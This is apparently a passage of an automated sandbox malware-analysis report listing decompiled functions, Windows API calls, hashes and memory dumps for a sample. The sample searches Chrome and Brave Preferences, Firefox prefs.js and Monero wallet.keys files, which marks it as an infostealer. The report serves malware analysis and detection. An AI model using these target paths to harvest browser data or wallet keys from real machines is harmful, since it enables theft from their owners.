                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-726946144
                              • Opcode ID: 6d7be6224877a19a943287e28b584f9f3a2f71c1cbbfaa27577c0300db77f07d
                              • Instruction ID: db036f8f077ea223b893caef287bd354282f7b4a0707f61f910e32d96318cf71
                              • Opcode Fuzzy Hash: 6d7be6224877a19a943287e28b584f9f3a2f71c1cbbfaa27577c0300db77f07d
                              • Instruction Fuzzy Hash: 024226B15101089BCB18FB64DD56EFD73BDAB54300F4085A8BA0AA7191EF74AF4DCB92
                              Function 00BF4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00BF492C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                              • StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                              • StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                              • FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: fb92550d771c905c21abebfc81b38557169308f03179fba4f4d86e2f1fdd1702
                              • Instruction ID: 8e1cf5862652a69696db157fae1210ad51c1f0e836d108bf7a794808a6cc7135
                              • Opcode Fuzzy Hash: fb92550d771c905c21abebfc81b38557169308f03179fba4f4d86e2f1fdd1702
                              • Instruction Fuzzy Hash: BA6112B1500219AFCB34EBA1DC49FFA73BCBB58701F0485D8E609A6141EB75AB49CF91
                              Function 00BF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
                              • wsprintfA.USER32 ref: 00BF45A6
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD
                              • StrCmpCA.SHLWAPI(?,00C00FC4), ref: 00BF45EB
                              • StrCmpCA.SHLWAPI(?,00C00FC8), ref: 00BF4601
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF468B
                              • FindClose.KERNEL32(000000FF), ref: 00BF46A0
                              • lstrcat.KERNEL32(?,009BF3B0), ref: 00BF46C5
                              • lstrcat.KERNEL32(?,009BDEE0), ref: 00BF46D8
                              • lstrlen.KERNEL32(?), ref: 00BF46E5
                              • lstrlen.KERNEL32(?), ref: 00BF46F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 8ddd8c5263fab52879a1f003d407a5702c8bbe7189921d94de3d399d42ae6cec
                              • Instruction ID: ab245f80ba52ff99a044c42b892c78cb8a9c08068c93c5b023b52a85ffbdf729
                              • Opcode Fuzzy Hash: 8ddd8c5263fab52879a1f003d407a5702c8bbe7189921d94de3d399d42ae6cec
                              • Instruction Fuzzy Hash: B95133B154021CAFCB24EB75DC89FFE73BCAB58300F4445D9B609A6190EB749B898F91
                              Function 00BF3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00BF3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BF3EDA
                              • StrCmpCA.SHLWAPI(?,00C00FAC), ref: 00BF3F08
                              • StrCmpCA.SHLWAPI(?,00C00FB0), ref: 00BF3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BF406C
                              • FindClose.KERNEL32(000000FF), ref: 00BF4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 7131ee06f47c1c711c59f7132863f5dbc7106475b4d855e85c8c87e623a4da5b
                              • Instruction ID: e85c7c94c0166bccfb207efa50c1e735ce759ad2fe3fdba2f0f7232c91af0b78
                              • Opcode Fuzzy Hash: 7131ee06f47c1c711c59f7132863f5dbc7106475b4d855e85c8c87e623a4da5b
                              • Instruction Fuzzy Hash: 245134B5900218ABCB28EBB5DC85EFA73BCBB54700F0445D8B759A6040DB75DB8E8F91
                              Function 00BEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00BEED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 00BEED55
                              • StrCmpCA.SHLWAPI(?,00C01538), ref: 00BEEDAB
                              • StrCmpCA.SHLWAPI(?,00C0153C), ref: 00BEEDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEF2AE
                              • FindClose.KERNEL32(000000FF), ref: 00BEF2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 5339623d88b7342b666b9502f3e30726f7f2b70d34e851c4286c35886b63ceb7
                              • Instruction ID: cd447338496f49b33e0c461638b68dac4b36a2a869a94210b223366c281aa7a7
                              • Opcode Fuzzy Hash: 5339623d88b7342b666b9502f3e30726f7f2b70d34e851c4286c35886b63ceb7
                              • Instruction Fuzzy Hash: 24E1CFB191111C9ADB58EB64CC51EFEB3B8AF54340F4041E9B60A63092EF706B8ECF51
                              Function 00BEF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C015B8,00C00D96), ref: 00BEF71E
                              • StrCmpCA.SHLWAPI(?,00C015BC), ref: 00BEF76F
                              • StrCmpCA.SHLWAPI(?,00C015C0), ref: 00BEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00BEFAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 1168fad50b37dfc1cc31687630045660eb787204c9ef7e36ce16d992e6602ee3
                              • Instruction ID: b5dc9554c3a8834fa14734cf4c14902bd55186f0378dce4b475ac0e0619e8032
                              • Opcode Fuzzy Hash: 1168fad50b37dfc1cc31687630045660eb787204c9ef7e36ce16d992e6602ee3
                              • Instruction Fuzzy Hash: 0DB12FB19001099BDB28FF64DC95AFD73B9AB54300F4085E8A50EA7195EF706B4DCB92
                              Function 00BE16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C0510C,?,?,?,00C051B4,?,?,00000000,?,00000000), ref: 00BE1923
                              • StrCmpCA.SHLWAPI(?,00C0525C), ref: 00BE1973
                              • StrCmpCA.SHLWAPI(?,00C05304), ref: 00BE1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BE1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00BE1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BE1E20
                              • FindClose.KERNEL32(000000FF), ref: 00BE1E32
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: d626084926d2de5754ad71a80cdb6acc695e4269d9fdc37e4114ec04e950aa0c
                              • Instruction ID: c2bbbd95400a62c3b16272e3a259572d0ec4879f891ae09dd763d6010cc66848
                              • Opcode Fuzzy Hash: d626084926d2de5754ad71a80cdb6acc695e4269d9fdc37e4114ec04e950aa0c
                              • Instruction Fuzzy Hash: DB12DCB191011C9BDB19EB64CC96AFE73B8AF54340F5085E9A60A63091EF706F8DCF91
                              Function 00BEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C00C2E), ref: 00BEDE5E
                              • StrCmpCA.SHLWAPI(?,00C014C8), ref: 00BEDEAE
                              • StrCmpCA.SHLWAPI(?,00C014CC), ref: 00BEDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00BEE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: f10df2a62862f3bcab698f52d4177928ed408a6a9da64fbbf3c0d492f8a4e0ee
                              • Instruction ID: dee21f00c2a38d545e9e53c52488166d48613556bdc8f9155e41d69be9d3b523
                              • Opcode Fuzzy Hash: f10df2a62862f3bcab698f52d4177928ed408a6a9da64fbbf3c0d492f8a4e0ee
                              • Instruction Fuzzy Hash: 75F18EB181411D9ADB29EB64CC95EFEB3B8AF14340F5041E9A61E63091EF706B4ECF51
                              Function 00BEDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C014B0,00C00C2A), ref: 00BEDAEB
                              • StrCmpCA.SHLWAPI(?,00C014B4), ref: 00BEDB33
                              • StrCmpCA.SHLWAPI(?,00C014B8), ref: 00BEDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00BEDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00BEDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: a3dc162e4d9502b2bf825ef658dc011226e82031d22e7e83122b799ae2f5ec64
                              • Instruction ID: 293fb31aed8362523b185f9a7f12ae999fb4efb35bece5f59496f1de9ae2f1f2
                              • Opcode Fuzzy Hash: a3dc162e4d9502b2bf825ef658dc011226e82031d22e7e83122b799ae2f5ec64
                              • Instruction Fuzzy Hash: FD9158B29001089BCB18FB75DC56DFD73BDAB84340F4085A8B90A97191EF74AB0DCB92
                              Function 00BF7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00C005AF), ref: 00BF7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00BF7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BF7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BF7C62
                              • LocalFree.KERNEL32(00000000), ref: 00BF7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
